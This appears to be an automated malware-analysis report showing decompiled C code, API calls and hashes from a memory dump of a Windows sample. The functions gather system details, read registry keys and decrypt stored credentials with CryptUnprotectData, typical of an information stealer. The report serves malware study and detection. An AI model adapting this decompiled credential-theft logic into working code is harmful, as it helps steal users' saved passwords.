Opcode Fuzzy Hash: dc46fd4b01959eb24f4a98efc8879a5c904661ccf0e9ab7b58004d9dad9a49e0
Instruction Fuzzy Hash: 6EF0303220021176E7301F39DD4DA6F29A99BC57F1B140729F962EA1F1E73884929566

Uniqueness

Uniqueness Score: -1.00%

Function 004178F9, Relevance: 4.7, APIs: 3, Instructions: 216
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004178F9(void* __ecx, void* __eflags) {
				void* _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				void* _v28;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				void* _v48;
				struct HINSTANCE__* _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v132;
				char _v652;
				void* __edi;
				void* __esi;
				void* _t76;
				struct HINSTANCE__* _t80;
				void* _t82;
				_Unknown_base(*)()* _t85;
				intOrPtr* _t88;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t96;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				intOrPtr* _t115;
				signed int _t120;
				char _t131;
				void* _t132;
				void* _t133;
				intOrPtr* _t146;
				void* _t151;
				void* _t160;
				WCHAR* _t161;
				CHAR* _t162;
				void* _t168;

				_t133 = __ecx;
				_t76 = 0x36;
				E00405B00(_t76,  &_v132);
				_t131 = 0;
				_t161 =  &_v652;
				_t80 = E0040AFA9(0x80000002, _t133, _t161,  &_v132, 0, 0x104);
				if(_t80 == 0xffffffff || _t80 == 0) {
					L34:
					return _t80;
				} else {
					_t80 = LoadLibraryW(_t161);
					_v52 = _t80;
					if(_t80 == 0) {
						goto L34;
					}
					_t162 =  &_v64;
					_t82 = 0x37;
					E00405ACA(_t82, _t162);
					_t85 = GetProcAddress(_v52, _t162);
					if(_t85 == 0) {
						L33:
						return FreeLibrary(_v52);
					}
					_push(0);
					_push(0);
					_push( &_v8);
					_push( &_v36);
					if( *_t85() != 0) {
						goto L33;
					}
					_t88 = _v36;
					_push( &_v44);
					_t157 =  &_v56;
					_push( &_v56);
					_push(_t88);
					_v12 = 0;
					if( *((intOrPtr*)( *_t88 + 0x64))() != 0) {
						L32:
						_t90 = _v36;
						 *((intOrPtr*)( *_t90 + 8))(_t90);
						_t92 = _v8;
						 *((intOrPtr*)( *_t92 + 8))(_t92);
						_push(0xcc);
						E00416CBC(_t157, _v12, 0x35);
						goto L33;
					}
					_t96 = _v36;
					_push( &_v48);
					_t157 =  &_v68;
					_push( &_v68);
					_push(0x10);
					_push(0);
					_push(_v44);
					_push(_v56);
					_push(_t96);
					if( *((intOrPtr*)( *_t96 + 0x38))() != 0) {
						L31:
						_t98 = _v8;
						 *((intOrPtr*)( *_t98 + 0x18))(_t98, _v44);
						goto L32;
					}
					if(_v68 != 4) {
						L30:
						_t100 = _v48;
						 *((intOrPtr*)( *_t100 + 8))(_t100);
						goto L31;
					}
					_t102 = _v48;
					_t157 =  &_v28;
					_push( &_v28);
					_push(0x200000);
					_push(_t102);
					if( *((intOrPtr*)( *_t102 + 0x38))() != 0) {
						goto L30;
					}
					_t104 = _v28;
					_t157 =  &_v60;
					_push( &_v60);
					_push(0);
					_push(_t104);
					if( *((intOrPtr*)( *_t104 + 0x24))() != 0) {
						L29:
						_t106 = _v28;
						 *((intOrPtr*)( *_t106 + 8))(_t106);
						goto L30;
					}
					_t108 = _v28;
					_t157 =  &_v40;
					_push( &_v40);
					_push(0);
					_push(_v60);
					_push(_t108);
					if( *((intOrPtr*)( *_t108 + 0x4c))() != 0) {
						goto L29;
					}
					_t110 = _v40;
					_v20 = 0;
					if( *_t110 <= 0) {
						L28:
						_t146 = _v8;
						_t157 =  *_t146;
						 *((intOrPtr*)( *_t146 + 0x18))(_t146, _t110);
						goto L29;
					}
					_v32 = 0;
					do {
						_t168 = _v32 + _t110 + 4;
						_v16 = _t131;
						if( *((intOrPtr*)(_t168 + 4)) <= _t131) {
							goto L27;
						}
						_v24 = _t131;
						do {
							_t115 =  *((intOrPtr*)(_t168 + 8)) + _v24;
							_t132 = 0;
							_t151 =  *_t115 - 0x3003001e;
							if(_t151 == 0) {
								_t164 =  *((intOrPtr*)(_t115 + 8));
								if(E00407B4A( *((intOrPtr*)(_t115 + 8)), 0x40) == 0) {
									goto L25;
								}
								_t120 = E004070C5(_t117 | 0xffffffff, 0, _t164);
								_t166 = _t120;
								if(_t120 != 0) {
									_t132 = E00407279(_t120 | 0xffffffff,  &_v12, _t166);
								}
								E00406E85(_t166);
								L23:
								if(_t132 != 0) {
									E00407279(1,  &_v12, 0x404b40);
								}
								goto L25;
							}
							if(_t151 != 1) {
								goto L25;
							}
							_t165 =  *((intOrPtr*)(_t115 + 8));
							_t160 = 0x40;
							if(E00407B5E( *((intOrPtr*)(_t115 + 8)), _t160) == 0) {
								goto L25;
							}
							_t132 = E00407279(_t128 | 0xffffffff,  &_v12, _t165);
							goto L23;
							L25:
							_v16 = _v16 + 1;
							_v24 = _v24 + 0x10;
						} while (_v16 <  *((intOrPtr*)(_t168 + 4)));
						_t131 = 0;
						L27:
						_t112 = _v8;
						 *((intOrPtr*)( *_t112 + 0x18))(_t112,  *((intOrPtr*)(_t168 + 8)));
						_v20 = _v20 + 1;
						_t110 = _v40;
						_v32 = _v32 + 0xc;
					} while (_v20 <  *_t110);
					goto L28;
				}
			}

0x004178f9
0x0041790a
0x0041790b
0x00417915
0x0041791b
0x00417926
0x0041792e
0x00417b47
0x00417b47
0x0041793c
0x0041793f
0x00417945
0x0041794a
0x00000000
0x00000000
0x00417952
0x00417955
0x00417956
0x00417961
0x00417969
0x00417b3a
0x00000000
0x00417b3d
0x0041796f
0x00417970
0x00417974
0x00417978
0x0041797d
0x00000000
0x00000000
0x00417983
0x0041798b
0x0041798c
0x0041798f
0x00417990
0x00417991
0x00417999
0x00417b18
0x00417b18
0x00417b1e
0x00417b21
0x00417b27
0x00417b2d
0x00417b35
0x00000000
0x00417b35
0x0041799f
0x004179a7
0x004179a8
0x004179ab
0x004179ac
0x004179ae
0x004179af
0x004179b2
0x004179b5
0x004179bb
0x00417b0c
0x00417b0c
0x00417b15
0x00000000
0x00417b15
0x004179c5
0x00417b03
0x00417b03
0x00417b09
0x00000000
0x00417b09
0x004179cb
0x004179d0
0x004179d3
0x004179d4
0x004179d9
0x004179df
0x00000000
0x00000000
0x004179e5
0x004179ea
0x004179ed
0x004179ee
0x004179ef
0x004179f5
0x00417afa
0x00417afa
0x00417b00
0x00000000
0x00417b00
0x004179fb
0x00417a00
0x00417a03
0x00417a04
0x00417a05
0x00417a08
0x00417a0e
0x00000000
0x00000000
0x00417a14
0x00417a17
0x00417a1c
0x00417af0
0x00417af0
0x00417af3
0x00417af7
0x00000000
0x00417af7
0x00417a22
0x00417a25
0x00417a28
0x00417a2c
0x00417a32
0x00000000
0x00000000
0x00417a38
0x00417a3b
0x00417a3e
0x00417a41
0x00417a45
0x00417a4b
0x00417a71
0x00417a7f
0x00000000
0x00000000
0x00417a87
0x00417a8c
0x00417a90
0x00417a9e
0x00417a9e
0x00417aa1
0x00417aa6
0x00417aa8
0x00417ab5
0x00417ab5
0x00000000
0x00417aa8
0x00417a4e
0x00000000
0x00000000
0x00417a50
0x00417a55
0x00417a5f
0x00000000
0x00000000
0x00417a6d
0x00000000
0x00417aba
0x00417aba
0x00417ac0
0x00417ac4
0x00417acd
0x00417acf
0x00417acf
0x00417ad8
0x00417adb
0x00417ade
0x00417ae4
0x00417ae8
0x00000000
0x00417a25

APIs

Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE

LoadLibraryW.KERNEL32(?,?,00000000,00000104,?,00000000,00000001), ref: 0041793F
GetProcAddress.KERNEL32(?,?), ref: 00417961
FreeLibrary.KERNEL32(?,?,00000000,00000001), ref: 00417B3D

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadOpenProc
String ID:
API String ID: 1197625071-0
Opcode ID: 77c11e080dd0586d904d330de35fa6e6fe8ad3c35d283f8a4d1f7a8cfd213e74
Instruction ID: 03e3d83d1675e57416ba932070766e100810faa6ab93917bbe63cdc74e755ccf
Opcode Fuzzy Hash: 77c11e080dd0586d904d330de35fa6e6fe8ad3c35d283f8a4d1f7a8cfd213e74
Instruction Fuzzy Hash: FB716F75A00209AFCB10DFA4C894EEEB7B9FF88354B144559F506E7291D734EE81CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00413002, Relevance: 4.6, APIs: 3, Instructions: 122
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00413002(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				void* _t39;
				signed int _t53;
				signed int _t54;
				long _t63;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t76;
				int _t86;
				void* _t87;
				void* _t91;
				void* _t93;

				_t76 = __edi;
				_t74 = __ecx;
				_t71 = __ebx;
				_t91 = _t93 - 0x74;
				 *(_t91 + 0x68) = 0x28;
				if(GetComputerNameW(_t91 - 0x14, _t91 + 0x68) == 0) {
					E00405B00(0xdc, _t91 - 0x14);
				}
				_push(_t71);
				_push(_t76);
				E00406F38(_t91 - 0x18c, _t91 - 0x18c, 0, 0x11c);
				 *(_t91 - 0x18c) = 0x11c;
				if(GetVersionExW(_t91 - 0x18c) != 0) {
					_push(0x100);
					_t39 = _t91 - 0x178;
				} else {
					_push(0x11c);
					_t39 = _t91 - 0x18c;
				}
				_push(0);
				_push(_t39);
				E00406F38(_t39);
				E00405B00(0xd7, _t91 - 0x70);
				E00405B00(0xd8, _t91 + 0x44);
				 *((intOrPtr*)(_t91 + 0x60)) = E0040B05F(0x80000002, _t74, _t91 - 0x70, _t91 + 0x44);
				E00405B00(0xd9, _t91 + 0x3c);
				_t86 = 0;
				 *(_t91 + 0x6c) = 0x80000002;
				 *((intOrPtr*)(_t91 + 0x70)) = 0;
				_t53 = RegOpenKeyExW(0x80000002, _t91 - 0x70, 0, 1, _t91 + 0x6c);
				if(_t53 != 0) {
					_t54 = _t53 | 0xffffffff;
				} else {
					_t54 = E0040B158(_t91 + 0x6c, _t91 + 0x3c, 0, _t91 + 0x70);
				}
				if(_t54 != 0xffffffff && _t54 > _t86) {
					_t86 = E00408234( *((intOrPtr*)(_t91 + 0x70)), _t54);
					E00406E85( *((intOrPtr*)(_t91 + 0x70)));
				}
				 *((intOrPtr*)(_t91 + 0x64)) = _t86;
				_t87 = _t91 + 0x44;
				E00405B00(0xda, _t87);
				_push(E00408234(_t91 + 0x60, 8));
				_push(E00408234(_t91 - 0x18c, 0x11c));
				_push(_t91 - 0x14);
				_t88 =  *((intOrPtr*)(_t91 + 0x7c));
				_push(_t87);
				_t75 = 0x3c;
				_t63 = E00407B78(_t87, _t75,  *((intOrPtr*)(_t91 + 0x7c)));
				 *(_t91 + 0x68) = _t63;
				if(_t63 < 1) {
					_t63 = E00405B00(0xdb, _t88);
				}
				return _t63;
			}

0x00413002
0x00413002
0x00413002
0x00413003
0x00413016
0x00413025
0x0041302f
0x0041302f
0x00413034
0x00413035
0x00413046
0x00413052
0x00413060
0x0041306b
0x00413070
0x00413062
0x00413062
0x00413063
0x00413063
0x00413076
0x00413077
0x00413078
0x00413085
0x00413092
0x004130aa
0x004130b5
0x004130c0
0x004130c8
0x004130cb
0x004130ce
0x004130d6
0x004130eb
0x004130d8
0x004130e4
0x004130e4
0x004130f1
0x00413103
0x00413105
0x00413105
0x0041310a
0x0041310d
0x00413115
0x00413125
0x00413133
0x00413137
0x0041313a
0x0041313d
0x00413140
0x00413143
0x0041314c
0x00413153
0x0041315a
0x0041315a
0x00413164

APIs

GetComputerNameW.KERNEL32 ref: 0041301D
GetVersionExW.KERNEL32(?,?,00000000,0000011C), ref: 00413058
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,?,?,?,00000000,00000100), ref: 004130CE

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputerNameOpenVersion
String ID:
API String ID: 2183321064-0
Opcode ID: c02438b6cc5bed3d8db0368e67aaa2aa3bb83cb7fca6d6872683b38d5419d8f2
Instruction ID: 9b68806a1d29c15bf198299543978280476cdeb2a0c83b4354aea2eabd1a6aff
Opcode Fuzzy Hash: c02438b6cc5bed3d8db0368e67aaa2aa3bb83cb7fca6d6872683b38d5419d8f2
Instruction Fuzzy Hash: 194160B2900218ABDB10EFA5CC45ADF77ACEF04304F50412BB915F3291DA38EA45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2A5, Relevance: 4.5, APIs: 3, Instructions: 27networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 0040A2AE
bind.WS2_32(00000000,00000017,-0000001D), ref: 0040A2CE
closesocket.WS2_32(00000000), ref: 0040A2D9

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: bindclosesocketsocket
String ID:
API String ID: 1873677229-0
Opcode ID: d7a35d400b93c52c0c26cf794c25d440246a81afdfdfcb43f63781092cf35779
Instruction ID: 7bc56377d4191a31409f920f53f4623e5ac1a4f2713ff4118f8de3bbdcff3f27
Opcode Fuzzy Hash: d7a35d400b93c52c0c26cf794c25d440246a81afdfdfcb43f63781092cf35779
Instruction Fuzzy Hash: 5DE0D83220020066E7205B39AC4EE6F25AD9BC17B0B540738F472E61E1D7388CC28124

Uniqueness

Uniqueness Score: -1.00%

Function 00417429, Relevance: 3.2, APIs: 2, Instructions: 162
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00417429(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				signed int _v48;
				void* _v52;
				char _v56;
				char _v72;
				void* _v96;
				char _v196;
				void* __ebx;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				signed int _t65;
				void* _t66;
				void* _t68;
				char* _t70;
				intOrPtr _t77;
				signed int* _t82;
				intOrPtr _t95;
				void* _t97;
				signed int _t100;
				void* _t107;
				void* _t109;
				intOrPtr _t115;
				char* _t117;
				void* _t129;

				_t121 = __eflags;
				_t115 = _a4;
				_push(_t115);
				_t92 = __eax;
				_t48 = E004173D6(__eax, __eflags, 0x4c);
				_push(_t115);
				_v20 = _t48;
				_t50 = E004173D6(_t92, _t121, 0x4f);
				_push(_t115);
				_v24 = _t50;
				_t52 = E004173D6(_t92, _t121, 0x50);
				_push(_t115);
				_v28 = _t52;
				_t54 = E004173D6(_t92, _t121, 0x4d);
				_push(_t115);
				_v36 = _t54;
				_v12 = E004173D6(_t92, _t121, 0x4e);
				_v5 = _v20 != 0;
				if(_v5 != 0) {
					_t95 = _v12;
					_t65 = E004079D4(_t95);
					if(_t95 != 0 && _t65 > 1) {
						_t100 = _t65 & 0x80000001;
						if(_t100 < 0) {
							_t129 = (_t100 - 0x00000001 | 0xfffffffe) + 1;
						}
						if(_t129 == 0) {
							asm("cdq");
							_v48 = _t65 - _t107 >> 1;
							_t77 = E00406E55(_t65 - _t107 >> 1);
							_v44 = _t77;
							if(_t77 != 0) {
								if(E004076C2(_v12, _t77) != 0) {
									_t82 =  &_v48;
									__imp__CryptUnprotectData(_t82, 0, _a8, 0, 0, 0,  &_v56);
									if(_t82 == 1) {
										_v16 = E00407241(_v52);
										LocalFree(_v52);
									}
								}
								E00406E85(_v44);
							}
						}
					}
					_t66 = 0x4b;
					E00405B00(_t66,  &_v196);
					_t117 =  &_v72;
					_t68 = 0x54;
					E00405B00(_t68, _t117);
					_t70 = 0x404284;
					_t109 =  ==  ? 0x404284 : _v16;
					_t97 =  ==  ? 0x404284 : _v36;
					_t135 = _v32;
					if(_v32 != 0) {
						_t70 = _t117;
					}
					_push(_t109);
					_push(_t97);
					_push(_t70);
					_push(_v20);
					E00407C06(_a12, E004079D4( *_a12),  *_a12, _t135,  &_v196, _a4);
					_t56 = E00406E85(_v16);
				}
				E0040D413(E0040D413(E0040D413(E0040D413(E0040D413(_t56, _v20), _v24), _v28), _v36), _v12);
				return _v5;
			}

0x00417429
0x00417434
0x00417437
0x0041743a
0x0041743d
0x00417442
0x00417445
0x00417449
0x0041744e
0x00417451
0x00417455
0x0041745a
0x0041745d
0x00417461
0x00417466
0x00417469
0x00417477
0x0041747a
0x00417481
0x004174cd
0x004174d0
0x004174d7
0x004174e0
0x004174e6
0x004174ec
0x004174ec
0x004174ed
0x004174ef
0x004174f4
0x004174f7
0x004174fc
0x00417501
0x0041750f
0x0041751b
0x00417520
0x00417529
0x00417539
0x0041753c
0x0041753c
0x00417529
0x00417545
0x00417545
0x00417501
0x004174ed
0x00417552
0x00417553
0x0041755a
0x0041755d
0x0041755e
0x0041756b
0x00417570
0x00417575
0x00417578
0x0041757b
0x0041757d
0x0041757d
0x0041757f
0x00417583
0x00417586
0x00417588
0x0041759e
0x004175a9
0x004175ae
0x004175d2
0x004175dd

APIs

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 00417520
LocalFree.KERNEL32(?,?,?,?), ref: 0041753C

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$CryptDataHeapLocalUnprotect
String ID:
API String ID: 2231100991-0
Opcode ID: e6e4262530a558d2759a3e9068cbe32fce09d7cf7a0e2d8e6b766706a3371319
Instruction ID: 9021a5df0f03a69deff09ab63c51ef76268b344bbb722c734445a6d3c89891a3
Opcode Fuzzy Hash: e6e4262530a558d2759a3e9068cbe32fce09d7cf7a0e2d8e6b766706a3371319
Instruction Fuzzy Hash: 7351BC71E08218AADF10AFE1DC45AEEBB76EF48314F10443AF515F7191D738A981CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00408C27, Relevance: 3.1, APIs: 2, Instructions: 62
filesynchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00408C27(void* __eax, void* __ecx, void* _a4, intOrPtr* _a8, void* _a12) {
				long _v8;
				char _v12;
				void* __esi;
				void* _t21;
				intOrPtr* _t25;
				void* _t29;
				char _t34;
				intOrPtr _t39;

				_push(__ecx);
				_push(__ecx);
				_t29 = __eax;
				_t34 = 0;
				if(__eax == 0 || __eax > 0xa00000) {
					_t29 = 0xa00000;
				}
				_v12 = _t34;
				while(_a12 == 0 || WaitForSingleObject(_a12, 0) == 0x102) {
					_t4 = _t34 + 0x1000; // 0x1000
					_v8 = 0x1000;
					if(E00406E10(_t4,  &_v12) == 0) {
						break;
					}
					_t39 = _v12;
					if(InternetReadFile(_a4, _t39 + _t34, _v8,  &_v8) == 0) {
						break;
					}
					if(_v8 == 0) {
						_t25 = _a8;
						if(_t25 == 0) {
							E00406E85(_t39);
						} else {
							 *_t25 = _t39;
							 *((intOrPtr*)(_t25 + 4)) = _t34;
						}
						_t21 = 1;
						L11:
						return _t21;
					}
					_t34 = _t34 + _v8;
					if(_t34 <= _t29) {
						continue;
					}
					break;
				}
				E00406E85(_v12);
				_t21 = 0;
				goto L11;
			}

0x00408c2a
0x00408c2b
0x00408c2f
0x00408c31
0x00408c3a
0x00408c40
0x00408c40
0x00408c42
0x00408c45
0x00408c5d
0x00408c66
0x00408c74
0x00000000
0x00000000
0x00408c76
0x00408c8f
0x00000000
0x00000000
0x00408c95
0x00408caf
0x00408cb4
0x00408cbe
0x00408cb6
0x00408cb6
0x00408cb8
0x00408cb8
0x00408cc3
0x00408ca8
0x00408cac
0x00408cac
0x00408c97
0x00408c9c
0x00000000
0x00000000
0x00000000
0x00408c9c
0x00408ca1
0x00408ca6
0x00000000

APIs

WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00408E84,00000000,00000000,?,00000000,?,?,?), ref: 00408C50
InternetReadFile.WININET(?,00001000,00001000,00001000), ref: 00408C87

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInternetObjectReadSingleWait
String ID:
API String ID: 226868713-0
Opcode ID: 7c9d5e5046c0aa7e50521916ce029fbb9dfa058464818703eeb18ea407df084e
Instruction ID: 305886e2ae2d526fac91624fc6de371cc2ad79be6fad2a1e570f80f7053b528d
Opcode Fuzzy Hash: 7c9d5e5046c0aa7e50521916ce029fbb9dfa058464818703eeb18ea407df084e
Instruction Fuzzy Hash: 91119031605209ABEF118F95CA44BEEB7B9EB40344F10007EE585B7290DBB99E81DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00417185, Relevance: 1.7, APIs: 1, Instructions: 209
comCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00417185() {
				void* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _v28;
				void* _v32;
				char _v44;
				char _v56;
				char _v68;
				char _v132;
				void* _v388;
				void* _v644;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t60;
				intOrPtr* _t69;
				intOrPtr* _t71;
				signed int _t72;
				intOrPtr* _t73;
				intOrPtr* _t75;
				signed int _t76;
				intOrPtr* _t80;
				signed int _t81;
				void* _t85;
				void* _t87;
				void* _t91;
				void* _t94;
				void* _t100;
				void* _t106;
				intOrPtr* _t112;
				signed int _t114;
				intOrPtr _t122;
				void* _t123;
				void* _t130;
				void* _t132;
				intOrPtr* _t133;
				intOrPtr* _t136;
				void* _t141;

				_t60 =  &_v32;
				_t114 = 0;
				_v32 = 0;
				__imp__CoCreateInstance(0x404ad0, 0, 0x4401, 0x404ae0, _t60);
				if(_t60 != 0) {
					L3:
					_v20 = _t114;
					_t133 = _t114;
					L4:
					if(_t133 == _t114) {
						return _t60;
					}
					_push(1);
					_push(_t114);
					_push(_t133);
					_v12 = _t114;
					if( *((intOrPtr*)( *_t133 + 0x40))() != 0) {
						L33:
						 *((intOrPtr*)( *_t133 + 8))(_t133);
						_push(0xcc);
						return E00416CBC(_t126, _v12, 0x3e);
					}
					_push( &_v28);
					_push(0xe);
					_push(_t133);
					if( *((intOrPtr*)( *_t133 + 0x14))() != 0) {
						goto L33;
					}
					while(1) {
						_t69 = _v28;
						_t126 =  &_v8;
						_push( &_v8);
						_push(_t69);
						if( *((intOrPtr*)( *_t69 + 0x14))() != 0) {
							break;
						}
						_t71 = _v8;
						_t72 =  *((intOrPtr*)( *_t71 + 0x38))(_t71,  &_v16);
						__eflags = _t72;
						if(_t72 == 0) {
							__eflags = _v16 - _t114;
							if(_v16 != _t114) {
								_t75 = _v8;
								_t76 =  *((intOrPtr*)( *_t75 + 0x14))(_t75, 0x123503f0,  &_v388, 0x100);
								__eflags = _t76;
								if(_t76 == 0) {
									__eflags =  &_v388 | 0xffffffff;
									_v24 = E004070C5( &_v388 | 0xffffffff, _t114,  &_v388);
								} else {
									_v24 = _t114;
								}
								_t80 = _v8;
								_t81 =  *((intOrPtr*)( *_t80 + 0x14))(_t80, 0x143203f0,  &_v644, 0x100);
								__eflags = _t81;
								if(_t81 == 0) {
									__eflags =  &_v644 | 0xffffffff;
									_t132 = E004070C5( &_v644 | 0xffffffff, _t114,  &_v644);
								} else {
									_t132 = 0;
								}
								_t85 = 0x4a;
								E00405B00(_t85,  &_v132);
								_t87 = 0x404284;
								_t130 = 0x404284;
								__eflags = _t132 - _t114;
								if(_t132 != _t114) {
									_t130 = _t132;
								}
								_t122 = _v24;
								_t136 = _v12;
								__eflags = _t122 - _t114;
								_t123 =  ==  ? _t87 : _t122;
								__eflags = _t136 - _t114;
								if(_t136 != _t114) {
									__eflags =  *_t136 - _t114;
									if( *_t136 != _t114) {
										_t87 = 0x404b40;
									}
								}
								_push(_t130);
								_push(_t123);
								_t91 = E00407C06( &_v12, E004079D4(_t136), _t136, __eflags,  &_v132, _t87);
								_t141 = _t141 + 0x10;
								E00406E85(_v24);
								E00406E85(_t132);
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									_t30 =  &_v16;
									 *_t30 = _v16 & 0x00000000;
									__eflags =  *_t30;
								}
								__eflags = _v16 & 0x00000002;
								if((_v16 & 0x00000002) != 0) {
									_t106 = 0x53;
									E00405B00(_t106,  &_v68);
									E00417045(_v8,  &_v68, 0x129803f0, 0x129d03e9, 0x129e03f5, 0x129903f0, 0x129a03f6,  &_v12);
								}
								__eflags = _v16 & 0x00000004;
								if((_v16 & 0x00000004) != 0) {
									_t100 = 0x52;
									E00405B00(_t100,  &_v56);
									E00417045(_v8,  &_v56, 0x13c403f0, 0x13c903e9, 0x13ca03f5, 0x13c503f0, 0x13c603f6,  &_v12);
								}
								__eflags = _v16 & 0x00000008;
								if((_v16 & 0x00000008) != 0) {
									_t94 = 0x51;
									E00405B00(_t94,  &_v44);
									E00417045(_v8,  &_v44, 0x142803f0, 0x142d03e9, 0x142e03f5, 0x142903f0, 0x142a03f6,  &_v12);
								}
								_t133 = _v20;
								_t114 = 0;
								__eflags = 0;
							}
						}
						_t73 = _v8;
						 *((intOrPtr*)( *_t73 + 8))(_t73);
					}
					_t112 = _v28;
					 *((intOrPtr*)( *_t112 + 8))(_t112);
					goto L33;
				}
				_t133 = _v32;
				if(_t133 == 0) {
					goto L3;
				} else {
					_v20 = _t133;
					goto L4;
				}
			}

0x00417191
0x0041719f
0x004171a7
0x004171aa
0x004171b2
0x004171c0
0x004171c0
0x004171c3
0x004171c5
0x004171c7
0x004173d5
0x004173d5
0x004171cf
0x004171d1
0x004171d2
0x004171d3
0x004171db
0x004173bb
0x004173be
0x004173c4
0x00000000
0x004173cc
0x004171e6
0x004171e7
0x004171e9
0x004171ef
0x00000000
0x00000000
0x0041739d
0x0041739d
0x004173a2
0x004173a5
0x004173a6
0x004173ac
0x00000000
0x00000000
0x004171fa
0x00417204
0x00417207
0x00417209
0x0041720f
0x00417212
0x00417218
0x00417230
0x00417233
0x00417235
0x00417244
0x0041724c
0x00417237
0x00417237
0x00417237
0x0041724f
0x00417262
0x00417265
0x00417267
0x00417275
0x0041727d
0x00417269
0x00417269
0x00417269
0x00417284
0x00417285
0x0041728a
0x0041728f
0x00417291
0x00417293
0x00417295
0x00417295
0x00417297
0x0041729a
0x0041729d
0x0041729f
0x004172a2
0x004172a4
0x004172a6
0x004172a9
0x004172ab
0x004172ab
0x004172a9
0x004172b0
0x004172b1
0x004172c3
0x004172c8
0x004172d0
0x004172d6
0x004172db
0x004172de
0x004172e0
0x004172e0
0x004172e0
0x004172e0
0x004172e4
0x004172e8
0x004172ef
0x004172f0
0x00417318
0x00417318
0x0041731d
0x00417321
0x00417328
0x00417329
0x00417351
0x00417351
0x00417356
0x0041735a
0x00417361
0x00417362
0x0041738a
0x0041738a
0x0041738f
0x00417392
0x00417392
0x00417392
0x00417212
0x00417394
0x0041739a
0x0041739a
0x004173b2
0x004173b8
0x00000000
0x004173b8
0x004171b4
0x004171b9
0x00000000
0x004171bb
0x004171bb
0x00000000
0x004171bb

APIs

CoCreateInstance.OLE32(00404AD0,00000000,00004401,00404AE0,?,?,00000000,00000001), ref: 004171AA

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: ea1e182f24280a5a3c27a789cda9a9344a354ac158f9946413158e52104d4bab
Instruction ID: 2b5aecae1da8b6085c7200bc0ebd95fa64390b05dd46823f8fbcc3c2df7c9a7e
Opcode Fuzzy Hash: ea1e182f24280a5a3c27a789cda9a9344a354ac158f9946413158e52104d4bab
